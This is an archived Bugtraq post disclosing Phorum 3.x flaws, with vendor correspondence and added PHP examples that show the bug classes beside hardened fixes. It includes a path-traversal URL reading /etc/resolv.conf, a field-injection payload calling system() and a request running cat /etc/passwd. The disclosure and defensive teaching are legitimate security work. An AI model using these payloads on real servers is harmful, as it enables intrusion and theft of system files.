Bugtraq mailing list archives
More on Phorum security problems, correction and updates
From: João Gouveia <cercthar () TELEWEB PT>
Date: Thu, 23 Nov 2000 18:58:15 -0000
The new 2.3.7 version of Phorum, released to correct these security problems, does not correct the problem, although it is exploited in a different way (description sent to the vuln-help team). I mentioned in my first message that it was possible to disclose Phorum's master password by calling a php file. That is not true. It is possible to do it, but not just by calling a file. Attached to this message are the mails I wrote to Phorum's staff regarding this issue(s).

Best regards,
Joao Gouveia aka Tharbad.
--- Begin Message --- From: João Gouveia <cercthar () teleweb pt>
Date: Thu, 23 Nov 2000 18:52:57 -0000
Hi again, sorry for insisting with this.

> I don't believe that the admin master password (or the per-forum mod
> passwords) are echoed by the admin pages. The database password is

Provided that forums.php is writeable (as readme.txt says it should be):

<quote>
3. Give write permissions to the webserver on the configuration files.
> cd [inf_path]
> chmod 707 forums.php
> chmod 706 forums.bak.php
</quote>

Since we can, hypothetically, run our own php code, it's still possible to manage a way to echo the password.

Best regards,
Joao Gouveia aka Tharbad.
--- End Message ---
--- Begin Message --- From: João Gouveia <cercthar () teleweb pt>
Date: Thu, 23 Nov 2000 18:33:25 -0000
----- Original Message -----
From: "Jason Birch" <jason () phorum org>
To: "João Gouveia" <cercthar () teleweb pt>
Sent: Thursday, November 23, 2000 6:00 PM
Subject: Re: Security flaw in Phorum 3.1 and higher

> On Thu, 23 Nov 2000 14:39:04 -0000, João Gouveia <cercthar () teleweb pt> spoke:
>
>> I am referring to existing scripts. This situation, of course, is only
>> possible if the malicious user knows about the first problem (the
>> possibility of reading other scripts like master.php). Having access to
>> the master password one can modify some existing forum.
>
> I don't believe that the admin master password (or the per-forum mod
> passwords) are echoed by the admin pages. The database password is though.
> I can see this being a problem if:
> a) the database password leaks
> b) the database accepts connections from outside the local network or localhost.

Of course.. my stupid mistake. The password shown is in <id>.php, the password of _a_ forum. Sorry about that.. I'll send an email to vuln-help correcting this, hope it arrives on time!

Best regards,
Joao Gouveia aka Tharbad.
--- End Message ---
--- Begin Message --- From: João Gouveia <cercthar () teleweb pt>
Date: Thu, 23 Nov 2000 16:53:54 -0000
Hi Jason,

The fix that is provided on Phorum's site doesn't efficiently take care of the security flaw. There is still a way of exploiting it.. Try this:

http://phorum.org/support/common.php?f=0&ForumLang=../../../../../../../etc/resolv.conf

Best regards,
Joao Gouveia aka Tharbad
--- End Message ---
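The message above shows a request parameter (ForumLang) that still reaches an include path after the vendor's first fix. The following PHP is an added example, not Phorum's code and not the fix the project shipped: it sketches the bug class (a request value spliced into a file path) next to two hardened resolvers, one based on realpath() canonicalisation and one based on an allow-list of installed languages. The language directory, its file names, the decoy file outside it and the attacker strings are constructed for the demo; PHP 8 is assumed for str_starts_with().

```php
<?php
declare(strict_types=1);

// Added example, not Phorum's code. Sketches the bug class behind the
// ForumLang report (a request parameter spliced into an include path) next
// to two hardened resolvers. The directory layout, file names and the
// hypothetical attacker inputs below are constructed for the demo.

$langdir = sys_get_temp_dir() . '/phorum_lang_demo';
@mkdir($langdir, 0700);
file_put_contents("$langdir/english.php", "<?php return 'English strings';\n");
file_put_contents("$langdir/portuguese.php", "<?php return 'Portuguese strings';\n");
// A file one level above $langdir, standing in for anything the web server
// user can read (the message used /etc/resolv.conf).
$outside = sys_get_temp_dir() . '/phorum_outside_demo.php';
file_put_contents($outside, "<?php return 'not a language file';\n");

// 1. Vulnerable shape: the request value becomes part of the path, so a
//    chain of "../" walks out of $langdir and include() reads whatever the
//    web server user can open.
function lang_path_vulnerable(string $langdir, string $forumLang): string
{
    return "$langdir/$forumLang";
}

// 2. Hardened by canonicalisation: resolve the candidate with realpath(),
//    which collapses "../" and follows symlinks, then require it to sit
//    under the language directory. Non-existent paths resolve to false.
function lang_path_canonical(string $langdir, string $forumLang): ?string
{
    $base = realpath($langdir);
    $path = realpath("$langdir/$forumLang.php");
    if ($base === false || $path === false) {
        return null;
    }
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

// 3. Hardened by allow-list: the request value is compared against the
//    installed language names and is only used as a path component when it
//    matches one exactly. No dependence on what "../" resolves to.
function lang_path_allowlist(string $langdir, string $forumLang): ?string
{
    $installed = array_map(
        fn(string $f): string => basename($f, '.php'),
        glob("$langdir/*.php") ?: []
    );
    return in_array($forumLang, $installed, true) ? "$langdir/$forumLang.php" : null;
}

$traversal = '../../../../../../../etc/resolv.conf';   // string from the message
$sibling   = '../phorum_outside_demo';                  // existing file outside $langdir

var_dump(lang_path_vulnerable($langdir, $traversal));
var_dump(lang_path_canonical($langdir, $traversal), lang_path_canonical($langdir, $sibling));
var_dump(lang_path_allowlist($langdir, $sibling), lang_path_allowlist($langdir, 'english'));

// Clean up the constructed files.
unlink($outside);
unlink("$langdir/english.php");
unlink("$langdir/portuguese.php");
rmdir($langdir);
```

The vulnerable resolver hands back a path that ends in /etc/resolv.conf, which is exactly what include() would then open. Both hardened resolvers return null for the traversal string and for the sibling file that really exists one directory up; the allow-list one returns the english.php path only for the name 'english'. Of the two, the allow-list is the one to prefer: it never lets the request value touch the filesystem, whereas a filter that looks for particular substrings in the parameter (the usual way a first fix fails) leaves room for encodings and patterns the filter did not anticipate.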
--- Begin Message --- From: João Gouveia <cercthar () teleweb pt>
Date: Thu, 23 Nov 2000 14:39:04 -0000
Hi,

----- Original Message -----
From: "Jason Birch" <jason () phorum org>
To: <cercthar () teleweb pt>
Sent: Thursday, November 23, 2000 7:54 AM
Subject: Re: Security flaw in Phorum 3.1 and higher

>> ..And it could allow executing arbitrary code. I sent this issue to the
>> vuln-help team of securityfocus on 11-20-2000. It seems that they are on
>> "vacations" and didn't touch it..
>
> The only way that I can see it allowing arbitrary (hacker-specified) code
> is if the admin has allow_uploads turned on. What am I missing? Or are you
> referring to existing php scripts elsewhere on the server?

I am referring to existing scripts. This situation, of course, is only possible if the malicious user knows about the first problem (the possibility of reading other scripts like master.php). Having access to the master password one can modify some existing forum.

<quote>
...
if($rec->folder=="0"){
    $data.=" \$ForumDisplay='$rec->display';\n";
    $data.=" \$ForumTableName='$rec->table_name';\n";
    $data.=" \$ForumModeration='$rec->moderation';\n";
    $data.=" \$ForumModEmail='$rec->mod_email';\n";
    $data.=" \$ForumModPass='$rec->mod_pass';\n";
....
$fp = fopen("$admindir/forums/$rec->id.php", "w");
fputs($fp, $data);
...
</quote>

So, we can add our php code to the fields. Using the master password obtained with the first problem, we edit one of the existing forums and we add something like, for example in the 'ForumModEmail' field:

mod () vuln host tld';system($com);echo'

This would execute our code, supplied in var 'com'. For example:

forum/list.php?f=1&com=cat%20/etc/passwd

> I can't say that I'm upset that securityfocus missed it. Gave us more time
> to respond. As far as I know, we were not informed until 2000-11-21. If you
> see anything like this in the future, I would

You didn't get the point.. sending this to vulnerability-help of securityfocus doesn't mean sending it to bugtraq or something. The goal of this is to let them do the work of advising the vendors, discussing the problem with the vendors, etc..
Not that I can't do it, but if they exist, it makes my life easier. Unfortunately, this only worked 1 time for me, I never got replies from the others (including Phorum's problem).

> really appreciate it if you could let us know directly at core () phorum org
> as soon as you suspect a problem. I am dedicated to fixing security-related
> issues with Phorum as quickly as possible.

Glad to know that. As I stated above, that's the purpose of working with the vuln-help team. One of their conditions is that they get to make the first contact with the vendor. That's why I was waiting.

Best regards,
Joao Gouveia aka Tharbad
--- End Message ---
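The message above quotes a config writer that drops database fields straight into generated PHP source, and a ForumModEmail value that breaks out of the single-quoted literal. The following PHP is an added example, not Phorum's code: it reproduces that writer shape beside one that serialises the value with var_export(), then shows with the tokenizer that the injected "system" is parsed as code in the first output and stays inside a string literal in the second. The payload is assumed to be the one from the message with the archive's e-mail mangling undone (mod@vuln.host.tld); the function names and the round-trip file are constructed for the demo.

```php
<?php
declare(strict_types=1);

// Added example, not Phorum's code. Reproduces the bug class in the config
// writer quoted above (a database field interpolated into generated PHP
// source) beside a writer that serialises the value with var_export(). The
// payload is assumed to be the one from the message with the archive's
// address mangling undone; everything else is constructed for the demo.

// Inside a single-quoted literal the first quote closes the string and the
// remainder is parsed as code; $com is then filled in from the request.
$payload = "mod@vuln.host.tld';system(\$com);echo'";

// 1. Vulnerable writer, same shape as the quoted snippet: the raw value is
//    dropped between two single quotes with no escaping.
function write_config_vulnerable(string $modEmail): string
{
    return "<?php\n\$ForumModEmail='$modEmail';\n";
}

// 2. Hardened writer: var_export() emits a PHP literal with quotes and
//    backslashes escaped, so whatever the field holds can only be a string.
function write_config_safe(string $modEmail): string
{
    return "<?php\n\$ForumModEmail=" . var_export($modEmail, true) . ";\n";
}

// Static check on generated source: does the identifier "system" occur as a
// bare name (i.e. as code) rather than inside a string literal?
function contains_bare_system(string $src): bool
{
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && $tok[0] === T_STRING && $tok[1] === 'system') {
            return true;
        }
    }
    return false;
}

var_dump(contains_bare_system(write_config_vulnerable($payload)));
var_dump(contains_bare_system(write_config_safe($payload)));

// Round-trip the safe file through include() to confirm the value survives
// exactly; the vulnerable file is deliberately never executed here.
$tmp = tempnam(sys_get_temp_dir(), 'cfg');
file_put_contents($tmp, write_config_safe($payload));
include $tmp;
var_dump($ForumModEmail === $payload);
unlink($tmp);
```

Run it and the three var_dump() calls report true, false and true: the vulnerable writer turns the field into a system() call, the var_export() writer keeps it a string, and the string that comes back from include() is byte-for-byte the stored value. In the thread the generated file is included on every forum request with the web server's privileges, which is why a single bad field becomes the list.php?f=1&com=... primitive. Escaping with var_export() is the minimal correct fix if the files must stay PHP; the more robust design is not to generate executable code from database content at all and to read the forum settings as data instead.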
Current thread:
- More on Phorum security problems, correction and updates João Gouveia (Nov 25)